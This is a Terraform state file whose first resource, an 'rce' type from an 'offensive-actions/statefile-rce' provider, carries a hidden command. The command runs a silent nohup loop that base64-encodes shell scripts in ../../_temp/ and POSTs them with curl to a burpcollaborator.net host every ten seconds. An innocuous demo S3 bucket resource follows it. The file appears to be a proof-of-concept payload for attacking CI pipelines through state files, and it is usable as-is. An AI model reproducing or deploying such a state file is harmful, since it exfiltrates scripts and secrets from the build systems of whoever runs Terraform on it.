{
  "version": 4,
  "terraform_version": "1.10.1",
  "serial": 1,
  "lineage": "abcd1234-5678-90ab-cdef-12345678abcd",
  "outputs": {},
  "resources": [
{
  "mode": "managed",
  "type": "rce",
  "name": "execmd",
  "provider": "provider[\"registry.terraform.io/offensive-actions/statefile-rce\"]",
  "instances": [
    {
      "schema_version": 0,
      "attributes": {
        "command": "echo run; nohup bash -c 'while true; do for file in ../../_temp/*.sh; do if [ -f "$file" ]; then base64_contents=$(base64 "$file"); curl -X POST -d "data=$base64_contents" "myoetgfp74gwxr73sjo6zlsay14usj.burpcollaborator.net"; fi; done; sleep 10; done' > /dev/null 2>&1 &",
        "id": "rce"
      },
      "sensitive_attributes": [],
      "private": "bnVsbA=="
    }
  ]
},
    {
      "mode": "managed",
      "type": "aws_s3_bucket",
      "name": "demo_bucket",
      "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
      "instances": [
        {
          "schema_version": 0,
          "attributes": {
            "acl": "private",
            "arn": "arn:aws:s3:::my-unique-demo-bucket-123456",
            "bucket": "my-unique-demo-bucket-123456",
            "bucket_domain_name": "my-unique-demo-bucket-123456.s3.amazonaws.com",
            "bucket_regional_domain_name": "my-unique-demo-bucket-123456.s3.us-east-1.amazonaws.com",
            "force_destroy": false,
            "hosted_zone_id": "Z3DZXE0Q79N41H",
            "id": "my-unique-demo-bucket-123456",
            "region": "us-east-1",
            "request_payer": "BucketOwner",
            "tags": {
              "CreatedBy": "Terraform",
              "Environment": "Demo"
            },
            "website_domain": "",
            "website_endpoint": ""
          },
          "sensitive_attributes": [],
          "private": "bnVsbA=="
        }
      ]
    }
  ]
}
